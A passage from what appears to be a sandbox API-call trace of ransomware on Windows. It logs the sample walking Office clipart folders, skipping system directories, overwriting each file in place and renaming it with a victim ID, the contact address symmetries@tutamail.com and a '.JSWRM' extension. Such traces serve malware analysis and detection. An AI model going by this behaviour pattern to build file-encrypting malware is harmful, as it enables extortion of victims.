ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3c45, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02897J.JPG", cAlternateFileName="")) returned 1 [0095.161] lstrcmpiW (lpString1="PH02897J.JPG", lpString2=".") returned 1 [0095.161] lstrcmpiW (lpString1="PH02897J.JPG", lpString2="..") returned 1 [0095.161] lstrcmpiW (lpString1="PH02897J.JPG", lpString2="...") returned 1 [0095.161] lstrcmpiW (lpString1="PH02897J.JPG", lpString2="windows") returned -1 [0095.161] lstrcmpiW (lpString1="PH02897J.JPG", lpString2="recovery") returned -1 [0095.161] lstrcmpiW (lpString1="PH02897J.JPG", lpString2="perflogs") returned 1 [0095.161] lstrcmpiW (lpString1="PH02897J.JPG", lpString2="documents and settings") returned 1 [0095.161] lstrcmpiW (lpString1="PH02897J.JPG", lpString2="$RECYCLE.BIN") returned 1 [0095.161] lstrcmpiW (lpString1="PH02897J.JPG", lpString2="system volume information") returned -1 [0095.161] lstrcmpiW (lpString1="PH02897J.JPG", lpString2="msocache") returned 1 [0095.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0095.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02897J.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02897J.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02897J.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0095.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0095.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02897J.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02897J.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02897J.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0095.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0095.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0095.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0095.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02897J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02897j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.162] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15429) returned 1 [0095.162] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3c40) returned 0x24d210 [0095.162] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3c40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3c40, lpOverlapped=0x0) returned 1 [0095.164] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.164] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3c40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3c40, lpOverlapped=0x0) returned 1 [0095.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.164] CloseHandle (hObject=0x314) returned 1 [0095.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0095.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0095.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0095.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0095.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0095.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0095.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.165] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02897J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02897j.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02897J.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02897j.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0095.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0095.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0095.166] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102a14ae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102a14ae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3c76, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH03011U.BMP", cAlternateFileName="")) returned 1 [0095.166] lstrcmpiW (lpString1="PH03011U.BMP", lpString2=".") returned 1 [0095.166] lstrcmpiW (lpString1="PH03011U.BMP", lpString2="..") returned 1 [0095.166] lstrcmpiW (lpString1="PH03011U.BMP", lpString2="...") returned 1 [0095.166] lstrcmpiW (lpString1="PH03011U.BMP", lpString2="windows") returned -1 [0095.166] lstrcmpiW (lpString1="PH03011U.BMP", lpString2="recovery") returned -1 [0095.166] lstrcmpiW (lpString1="PH03011U.BMP", lpString2="perflogs") returned 1 [0095.166] lstrcmpiW (lpString1="PH03011U.BMP", lpString2="documents and settings") returned 1 [0095.166] lstrcmpiW (lpString1="PH03011U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0095.166] lstrcmpiW (lpString1="PH03011U.BMP", lpString2="system volume information") returned -1 [0095.166] lstrcmpiW (lpString1="PH03011U.BMP", lpString2="msocache") returned 1 [0095.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0095.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03011U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03011U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH03011U.BMP", lpUsedDefaultChar=0x0) returned 12 [0095.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0095.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0095.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03011U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03011U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH03011U.BMP", lpUsedDefaultChar=0x0) returned 12 [0095.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0095.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0095.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0095.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0095.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03011U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03011u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.167] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15478) returned 1 [0095.167] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3c70) returned 0x24d210 [0095.167] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3c70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3c70, lpOverlapped=0x0) returned 1 [0095.170] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.170] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3c70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3c70, lpOverlapped=0x0) returned 1 [0095.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.170] CloseHandle (hObject=0x314) returned 1 [0095.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0095.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0095.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0095.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0095.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0095.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0095.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0095.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0095.170] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03011U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03011u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03011U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03011u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0095.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0095.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0095.171] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102a14ae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102a14ae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1016, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH03012U.BMP", cAlternateFileName="")) returned 1 [0095.171] lstrcmpiW (lpString1="PH03012U.BMP", lpString2=".") returned 1 [0095.171] lstrcmpiW (lpString1="PH03012U.BMP", lpString2="..") returned 1 [0095.171] lstrcmpiW (lpString1="PH03012U.BMP", lpString2="...") returned 1 [0095.171] lstrcmpiW (lpString1="PH03012U.BMP", lpString2="windows") returned -1 [0095.171] lstrcmpiW (lpString1="PH03012U.BMP", lpString2="recovery") returned -1 [0095.171] lstrcmpiW (lpString1="PH03012U.BMP", lpString2="perflogs") returned 1 [0095.171] lstrcmpiW (lpString1="PH03012U.BMP", lpString2="documents and settings") returned 1 [0095.172] lstrcmpiW (lpString1="PH03012U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0095.172] lstrcmpiW (lpString1="PH03012U.BMP", lpString2="system volume information") returned -1 [0095.172] lstrcmpiW (lpString1="PH03012U.BMP", lpString2="msocache") returned 1 [0095.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0095.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03012U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03012U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH03012U.BMP", lpUsedDefaultChar=0x0) returned 12 [0095.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0095.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0095.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03012U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03012U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH03012U.BMP", lpUsedDefaultChar=0x0) returned 12 [0095.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0095.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0095.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0095.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0095.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03012U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03012u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.172] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4118) returned 1 [0095.172] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1010) returned 0x23fc98 [0095.172] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x1010, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x1010, lpOverlapped=0x0) returned 1 [0095.174] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.174] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x1010, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x1010, lpOverlapped=0x0) returned 1 [0095.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0095.175] CloseHandle (hObject=0x314) returned 1 [0095.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0095.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0095.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0095.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0095.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0095.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0095.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.176] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03012U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03012u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03012U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03012u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0095.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0095.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0095.176] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102a14ae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102a14ae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x49d2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH03014_.GIF", cAlternateFileName="")) returned 1 [0095.176] lstrcmpiW (lpString1="PH03014_.GIF", lpString2=".") returned 1 [0095.177] lstrcmpiW (lpString1="PH03014_.GIF", lpString2="..") returned 1 [0095.177] lstrcmpiW (lpString1="PH03014_.GIF", lpString2="...") returned 1 [0095.177] lstrcmpiW (lpString1="PH03014_.GIF", lpString2="windows") returned -1 [0095.177] lstrcmpiW (lpString1="PH03014_.GIF", lpString2="recovery") returned -1 [0095.177] lstrcmpiW (lpString1="PH03014_.GIF", lpString2="perflogs") returned 1 [0095.177] lstrcmpiW (lpString1="PH03014_.GIF", lpString2="documents and settings") returned 1 [0095.177] lstrcmpiW (lpString1="PH03014_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0095.177] lstrcmpiW (lpString1="PH03014_.GIF", lpString2="system volume information") returned -1 [0095.177] lstrcmpiW (lpString1="PH03014_.GIF", lpString2="msocache") returned 1 [0095.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0095.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03014_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03014_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH03014_.GIF", lpUsedDefaultChar=0x0) returned 12 [0095.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0095.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0095.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03014_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 